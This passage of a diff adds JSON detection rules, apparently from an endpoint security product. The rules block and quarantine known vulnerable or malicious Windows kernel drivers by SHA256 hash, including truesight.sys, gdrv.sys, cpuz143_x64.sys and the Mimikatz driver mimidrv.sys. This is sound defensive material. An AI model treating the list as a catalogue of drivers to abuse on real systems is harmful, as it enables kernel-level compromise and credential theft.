+ "creation_date": "2026-03-23T11:45:31.828026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0711adbe0d45695e507b196625c70f29f17af40d48e1575903d3c658803ffb2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c19dc67-ed30-5824-8490-74110b6730b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820298Z",
+ "creation_date": "2026-03-23T11:45:31.820301Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820310Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97b2275049846d6a65b7a684085f6e984db9a6a62e4547a984a7441e14b6bd5a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c308c1d-a694-5f55-b0d1-ecddc04094bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979812Z",
+ "creation_date": "2026-03-23T11:45:29.979814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3700b38d63d426ff0a985226b45eca6e24d052f4262d12aff529e62c2cb889c3",
+ "comment": "Vulnerable Kernel Driver (aka nt4.sys) [https://www.loldrivers.io/drivers/1d4f7a3a-786b-4a74-b34f-14d44343de9e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c395fec-937e-5e55-ad01-37bd3caf8818",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822037Z",
+ "creation_date": "2026-03-23T11:45:30.822039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822046Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a9b98a8234d3e560feef5ec88f35960f631d111351d7085c011e055dfec7d3ce",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c3dc435-ec9d-59a5-94b8-f4e8bb17e528",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621496Z",
+ "creation_date": "2026-03-23T11:45:29.621498Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621503Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71ff60722231c7641ad593756108cf6779dbaad21c7b08065fb1d4e225eab14d",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c4c470f-10f4-5078-aec0-2ccf414d7938",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486371Z",
+ "creation_date": "2026-03-23T11:45:31.486374Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486382Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d45901faf83202835300cfe959227a39001b8c37681cd67359f36158431c07f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c518d00-1ef3-5487-9b4c-ea857db77aff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971749Z",
+ "creation_date": "2026-03-23T11:45:29.971751Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971756Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f",
+ "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c68a0e4-de31-5fa6-b957-10f27179ca83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479797Z",
+ "creation_date": "2026-03-23T11:45:31.479800Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479810Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b382a9b09066a08e1db92e46cb2cf14f3741b1a5342a40ec7d1acb00fab7ada",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c6ae79e-7b43-5c5b-b8c7-8d4c55ab8b0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459821Z",
+ "creation_date": "2026-03-23T11:45:30.459824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88992ddcb9aaedb8bfcc9b4354138d1f7b0d7dddb9e7fcc28590f27824bee5c3",
+ "comment": "Vulnerable Kernel Driver (aka gdrv.sys) [https://www.loldrivers.io/drivers/2bea1bca-753c-4f09-bc9f-566ab0193f4a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c775d63-c31f-57b3-839b-e712bc597999",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832624Z",
+ "creation_date": "2026-03-23T11:45:30.832626Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832631Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77ae110ba425dcefb6fbfaa7f6a72324361f027cf32fee91f1b13c4add422150",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c797afb-4736-55da-b34c-c721b3c05f0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970280Z",
+ "creation_date": "2026-03-23T11:45:29.970281Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970287Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c7a0810-fbdf-5208-8710-3728c3516c98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818351Z",
+ "creation_date": "2026-03-23T11:45:31.818355Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818364Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ee10186740679439654168d2319de2a1a8a3fc1077acb505db8636c28b8dd89",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c7c1adf-cb51-5076-b56b-a2b7c2b551a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610846Z",
+ "creation_date": "2026-03-23T11:45:29.610848Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610853Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0b5a5f8333fc1213791af5c5814d7a99615b3951361ca75f8aa5022c9cfbc2b",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c99092a-f034-5bdd-b44c-f6fcafb0191b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812562Z",
+ "creation_date": "2026-03-23T11:45:31.812564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812570Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09ada32541233dce3a892b93d39bb02611b3a31d6704f676f83b40f8ce215133",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ca22587-b8ea-57d3-a2f7-ed29b9e9b48e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826026Z",
+ "creation_date": "2026-03-23T11:45:31.826029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29c2e854791e4f948e2117dde442d8671f6b365efcaf80a1579c08e275e55b34",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ca2a791-1061-5e13-bb66-573e3875f866",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809006Z",
+ "creation_date": "2026-03-23T11:45:31.809008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae60bdc5497190c5bd278f2e4c7afd1c5b8604d49d1b9f448efc75f7ef9b7d54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ca2e12b-dc7b-5bed-935c-2fd03f128dc8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810450Z",
+ "creation_date": "2026-03-23T11:45:31.810452Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810458Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f3bc8ff2bcfaf8c59ce9b946ea8abf2c0530af9da66b8ccb3760b10264794df",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8cc53f01-1a89-5a5c-8434-235fc4898f77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819191Z",
+ "creation_date": "2026-03-23T11:45:31.819193Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a19007ece916157952ff5cda5bf0b4342d2f009a7d368aaa29c169d3794d9016",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8cc581fb-33c6-5ade-8fab-557e913534f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500176Z",
+ "creation_date": "2026-03-23T11:45:31.500179Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500188Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0f4c9253ff3380224484a8a9ef15971dbaffbed1d09a7e0ee48fdfca3d1501d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ccfd284-a8b7-5204-9cd3-d8d7f0b87b43",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469008Z",
+ "creation_date": "2026-03-23T11:45:30.469011Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469020Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b4ac66225600b3d5b89f6b0440ccdd0f59279fd0bbf4af82f1aab63df54b883",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8cd3943a-5473-5e11-a399-4c88312d1f49",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466072Z",
+ "creation_date": "2026-03-23T11:45:30.466075Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12b0000698b79ea3c8178b9e87801cc34bad096a151a8779559519deafd4e3f0",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8cd599b5-6587-5d02-8242-09eeaac6cdf1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827893Z",
+ "creation_date": "2026-03-23T11:45:30.827895Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827900Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "415fa8623e0e8ec991093365cfce3a913f8711198fcf2e7ffb4d59712348ab67",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8cd82f15-0280-5a9b-82c2-debf16e530e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458664Z",
+ "creation_date": "2026-03-23T11:45:30.458667Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1204026fdc9c859960ee561eb9f1fd9ebf6c88c78c5d4cee35ef029ad5050ec6",
